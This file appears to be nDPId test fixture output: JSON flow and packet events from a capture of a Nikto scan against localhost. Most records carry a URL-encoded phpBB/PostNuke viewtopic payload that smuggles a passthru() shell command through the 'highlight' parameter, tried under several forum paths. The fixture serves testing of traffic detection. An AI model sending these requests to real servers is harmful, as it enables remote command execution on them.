00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":1,"flow_last_seen":1576420277743,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":1576420277743,"pkt":"AAAAAAAAAAAAAAAACABFAAFGAG5AAEAGO0J\/AAABfwAAAcasH5AOKDl4jiUqhYAYAED\/OgAAAQEICp1m\/xedZv8XR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzg5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01188{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7580000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001389)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":1,"flow_last_seen":1576420277745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277745,"pkt":"AAAAAAAAAAAAAAAACABFAAFddiRAAEAGxXR\/AAABfwAAAcauH5DeiE8\/TEH5WoAYAED\/UQAAAQEICp1m\/xmdZv8ZR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01211{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277746,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":1,"flow_last_seen":1576420277746,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277746,"pkt":"AAAAAAAAAAAAAAAACABFAAFmjyxAAEAGrGN\/AAABfwAAAcawH5C1dLY3dpi6dIAYAED\/WgAAAQEICp1m\/xqdZv8aR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277746,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7580000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":1,"flow_last_seen":1576420277747,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":377,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":377,"pkt_l4_len":343,"thread_ts_msec":1576420277747,"pkt":"AAAAAAAAAAAAAAAACABFAAFrmeBAAEAGoap\/AAABfwAAAcayH5AmkqDEx1CXDIAYAED\/XwAAAQEICp1m\/xudZv8bR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01227{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7580000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7580000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":1,"flow_last_seen":1576420277749,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1576420277749,"pkt":"AAAAAAAAAAAAAAAACABFAAFlinpAAEAGsRZ\/AAABfwAAAca0H5BJbLNma4SLi4AYAED\/WQAAAQEICp1m\/x2dZv8dR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01220{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7580000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277750,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":1,"flow_last_seen":1576420277750,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277750,"pkt":"AAAAAAAAAAAAAAAACABFAAFjJWNAAEAGFjB\/AAABfwAAAca2H5CBThx9EGPplIAYAED\/VwAAAQEICp1m\/x6dZv8eR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01218{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277750,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277752,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":1,"flow_last_seen":1576420277752,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277752,"pkt":"AAAAAAAAAAAAAAAACABFAAFjNwZAAEAGBI1\/AAABfwAAAca4H5DKtQ4b91nN3YAYAED\/VwAAAQEICp1m\/yCdZv8gR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01218{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277752,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277753,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":1,"flow_last_seen":1576420277753,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":364,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":364,"pkt_l4_len":330,"thread_ts_msec":1576420277753,"pkt":"AAAAAAAAAAAAAAAACABFAAFeFwdAAEAGJJF\/AAABfwAAAca6H5C+9y4cicj8j4AYAED\/UgAAAQEICp1m\/yGdZv8hR0VUIC9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01212{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277753,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":1,"flow_last_seen":1576420277754,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277754,"pkt":"AAAAAAAAAAAAAAAACABFAAFnn4NAAEAGnAt\/AAABfwAAAca8H5BO76agHBQLN4AYAED\/WwAAAQEICp1m\/yKdZv8iR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="}
01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
